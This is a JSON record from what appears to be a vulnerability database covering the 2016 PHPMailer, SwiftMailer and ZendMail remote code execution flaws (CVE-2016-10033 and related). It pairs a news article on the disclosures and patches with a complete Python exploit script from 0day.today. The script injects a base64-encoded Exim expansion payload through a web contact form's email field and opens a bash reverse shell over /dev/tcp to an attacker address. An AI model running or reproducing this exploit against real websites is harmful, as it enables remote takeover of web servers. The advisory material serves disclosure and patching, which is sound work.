net", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-01-27T09:18:19", "bulletinFamily": "info", "description": "[](<https://2.bp.blogspot.com/-2Z4IlyWvnVA/WGuAA0XIxDI/AAAAAAAAq18/h4xhtaXJX8sW4Ob1B4LdqYSAc4sXo198wCLcB/s1600/phpmailer-swiftmailer-zendmail.png>)\n\nA security researcher recently reported a [critical vulnerability](<https://thehackernews.com/2016/12/phpmailer-security.html>) in one of the most popular open source PHP libraries used to send emails that allowed a remote attacker to execute arbitrary code in the context of the web server and compromise a web application. \n \nDisclosed by Polish security researcher [Dawid Golunski](<https://twitter.com/dawid_golunski>) of Legal Hackers, the issue ([CVE-2016-10033](<https://thehackernews.com/2016/12/phpmailer-security.html>)) in PHPMailer used by more than 9 Million users worldwide was thought to be fixed with the release of version 5.2.18. \n \nHowever, Golunski managed to bypass the patched version of PHPMailer that was given a new CVE ([CVE-2016-10045](<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html>)), which once again put millions of websites and popular open source web apps, including WordPress, Drupal, 1CRM, SugarCRM, Yii, and Joomla, at risk of remote code execution attack. \n \nPHPMailer eventually fixed the issue with an update, [version 5.2.20](<https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md>). All versions of PHPMailer before this critical release are affected, so web administrators and developers are strongly recommended to update to the new version. \n \nIn addition to this bug, Golunski also reported a similar vulnerability in two other mailing libraries for PHP, [SwiftMailer](<https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html>), and [ZendMail](<https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html>), that could have also led to remote code execution attack. \n \n\n\n### RCE Flaw in SwiftMailer\n\n \nSwiftMailer is also a popular PHP library used by many major open-source projects, including top PHP programming frameworks like Yii2, Laravel, Symfony for sending emails over SMTP. \n \nThe vulnerability (CVE-2016-10074) in SwiftMailer can be exploited in the same manner as the [PHPMailer vulnerability](<https://thehackernews.com/2016/12/phpmailer-security.html>) by targeting web site components that use SwiftMailer class, such as contact/registration forms, password email reset forms, and so forth. \n \nAttackers can execute arbitrary code remotely in the context of the web server, which could further be exploited to access a web server hosting a web application that used a vulnerable version of the library. \n \nThe SwiftMailer vulnerability affects all versions of the library, including the then-current release, version 5.4.5-DEV. \n \nGolunski disclosed the vulnerability to SwiftMailer team, and developers acted fast to fix the issue, rolling out patched version 5.4.5 within a day. \n \n\"The mail transport (Swift_Transport_MailTransport) was vulnerable to passing arbitrary shell arguments if the \"From,\" \"ReturnPath\" or \"Sender\" header came from a non-trusted source, potentially allowing Remote Code Execution,\" reads the changelog for SwiftMailer on [GitHub](<https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGES>). \n \n\n\n### RCE Flaw in ZendMail\n\n[](<https://4.bp.blogspot.com/-Ii-1BPjXwCc/WGt59QirE8I/AAAAAAAAq1s/oYWKumzDrhUmFFOxMrBkA_gNJw7WTbZagCLcB/s1600/zendmail-exploit.png>)\n\nZendMail is a component of a very popular PHP programming framework Zend Framework with more than 95 Million installations. \n \nThe critical vulnerability (CVE-2016-10034) in ZendMail can also be exploited in the same manner as one discovered in PHPMailer and SwiftMailer by targeting web site components that use ZendMail, like contact/registration forms, password email reset forms, and so on. \n \nAttackers could achieve remote code execution in the context of the web server and could remotely compromise the target web application that used the vulnerable version of the ZendMail. \n \nThe researcher reported the issue to ZendMail, and the developers fixed the vulnerability and rolled out the patched version. \n\n\n> \"When using the zend-mail component to send email via the Zend\\Mail\\Transport\\Sendmail transport, a malicious user may be able to inject arbitrary parameters to the system sendmail program,\" ZendMail wrote in a [blog post](<https://framework.zend.com/security/advisory/ZF2016-04>).\n\n> \"The attack is performed by providing additional quote characters within an address; when unsanitized, they can be interpreted as additional command line arguments, leading to the vulnerability.\"\n\nGolunski has released a proof-of-concept video demonstration that will show all the three attacks in action. \n\n\nGolunski has also released a 3-in-1 exploit, nicknamed [PwnScriptum](<https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py>), about the vulnerabilities in PHPMailer, SwiftMailer, and ZendMail. \n \nThe researcher will soon be revealing a security [white-paper](<https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html>) with previously unknown exploitation vectors and techniques that can be used to exploit all the 3 vulnerabilities.\n", "modified": "2017-01-05T07:21:09", "published": "2017-01-02T23:45:00", "id": "THN:BD003AAB715C2448BF92B78197DE160C", "href": "https://thehackernews.com/2017/01/phpmailer-swiftmailer-zendmail.html", "type": "thn", "title": "Critical Updates \u2014 RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-06T21:09:00", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-06-22T00:00:00", "published": "2017-06-22T00:00:00", "href": "https://0day.today/exploit/description/28005", "id": "1337DAY-ID-28005", "title": "PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n#\r\n# Exploit Title: [RCE for PHPMailer < 5.2.20 with Exim MTA]\r\n# Date: [16/06/2017]\r\n# Exploit Author: [@phackt_ul]\r\n# Software Link: [https://github.com/PHPMailer/PHPMailer]\r\n# Version: [< 5.2.20]\r\n# Tested on: [Debian x86/x64]\r\n# CVE : [CVE-2016-10033,CVE-2016-10074,CVE-2016-10034,CVE-2016-10045]\r\n#\r\n# @phackt_ul - https://phackt.com\r\n#\r\n# All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com\r\n# and its research on PHP libraries vulns\r\n#\r\n# PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\r\n# PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\r\n# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\n# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\n#\r\n# ExploitBox project:\r\n# https://ExploitBox.io\r\n#\r\n# Full advisory URL:\r\n# https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html\r\n# https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html\r\n# http://pwnscriptum.com/\r\n#\r\n# --------------------------------------------------------\r\n# Enhanced for Exim MTA\r\n# \r\n# N.B: \r\n# The original author's method in the PHPMailer POC (for sendmail MTA) uses the RFC 3696 \r\n# double quotes technique associated with the -oQ -X options to log mailer traffic and to create \r\n# the backdoor. This technique is not facing some payload size issues because the payload \r\n# was in the email body.\r\n#\r\n# For Exim:\r\n# The original author's Wordpress 4.6 POC for Exim combines the comment syntax (RFC 822)\r\n# and the Exim expansion mode techniques. The use of substr on spool_directory and tod_log \r\n# expansion variables in order to bypass the PHP mail() escaping may leads to large \r\n# email addresses payloads. However the comment syntax validateAddress() technique does not \r\n# face any size limitation but its use can not be applied for PHPMailer < 5.2.20.\r\n#\r\n# Goal:\r\n# The use of double quotes validateAdresse() technique (and it's patch bypass for PHPMailer < 5.5.20) \r\n# combined with the Exim expansion mode technique may leads to large payloads quickly facing addresses\r\n# size limit here (260 chars) and so not matching the pcre8 regexp in the validateAddress() function.\r\n# We are now base64 encoding the command in order to bypass escapeshellcmd() and allowing larger payloads.\r\n# \r\n#\r\n# Usage:\r\n# ./rce_phpmailer_exim4.py -url http://victim/phpmailer/ -cf contact_form.php -ip 192.168.1.109 -p 1337\r\n#\r\n#\r\n# Requirements:\r\n# - Vulnerable PHP libraries\r\n# - Exim MTA Agent\r\n#\r\n# \r\n# Disclaimer:\r\n# For testing purposes only on your local machine - http://pwnscriptum.com/PwnScriptum_PHPMailer_PoC_contactform.zip\r\n \r\nimport argparse\r\nimport urllib\r\nimport urllib2\r\nimport base64\r\n \r\n# Prepare command for Exim expansion mode in order \r\ndef prepare_cmd(cmd):\r\n return '${run{${base64d:%s}}}' % base64.b64encode(cmd)\r\n \r\n# Send Request method\r\ndef send_request(req):\r\n try:\r\n urllib2.urlopen(req)\r\n except urllib2.HTTPError, e:\r\n print \"[!] Got HTTP error: [%d] when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % e.code\r\n exit(3)\r\n except urllib2.URLError, err:\r\n print \"[!] Got the '%s' error when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % err.reason\r\n exit(4)\r\n \r\n# Parse input args\r\nparser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')\r\nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')\r\nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')\r\nparser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')\r\nparser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default=\"8888\")\r\nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\")\r\nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\")\r\nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\")\r\nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\")\r\nargs = parser.parse_args()\r\n \r\nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT\r\n \r\n# Show params\r\nprint \"\"\"[+] Setting vars to: \\n\r\nWEBAPP_BASE_URL = [%s]\r\nCONTACT_SCRIPT = [%s]\r\nATTACKER_IP = [%s]\r\nATTACKER_PORT = [%s]\r\nPOST_ACTION = [%s]\r\nPOST_NAME = [%s]\r\nPOST_EMAIL = [%s]\r\nPOST_MSG = [%s]\r\n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)\r\n \r\n# Ask for mail library\r\nprint \"[+] Choose your target / payload: \"\r\nprint \"\\033[1;34m\"\r\nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\"\"\"\r\nprint \"\"\" SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\"\"\"\r\nprint \"\"\" Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\"\r\nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\"\"\"\r\nprint \"\\033[0m\"\r\n \r\ntry:\r\n target = int(raw_input('[?] Select target [1-2]: '))\r\nexcept ValueError:\r\n print \"Not a valid choice. Exiting\\n\"\r\n exit(2)\r\n \r\nif (target>2):\r\n print \"No such target. Exiting\\n\"\r\n exit(3)\r\n \r\n################################\r\n# Payload\r\n################################\r\ncmd = \"/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'\"\r\nprepared_cmd = prepare_cmd(cmd)\r\n \r\npayload = '\"a\\\\\" -be ' + prepared_cmd + ' \"@a.co'\r\n \r\n# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)\r\nif target == 2:\r\n payload = \"\\\"a\\\\' -be \" + prepared_cmd + \" \\\"@a.co\"\r\n \r\n################################\r\n# Attack episode\r\n# This step will execute the reverse shell\r\n################################\r\n \r\n# Form fields\r\npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: 'Really important message'}\r\n \r\n# Print relevant information\r\nprint \"\\n[+] Executing command on victim server\\n\"\r\nprint '[!] command: [%s]' % cmd\r\nprint '[!] payload: [%s]' % payload\r\nprint '[!] post_fields: [%s]\\n' % str(post_fields)\r\n \r\ndata = urllib.urlencode(post_fields)\r\nreq = urllib2.Request(CONTACT_SCRIPT_URL, data)\r\nsend_request(req)\r\n \r\nprint \"\\033[1;32m[+] You should check your listener and cross the fingers ;)\\033[0m\\n\"\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28005"}]}
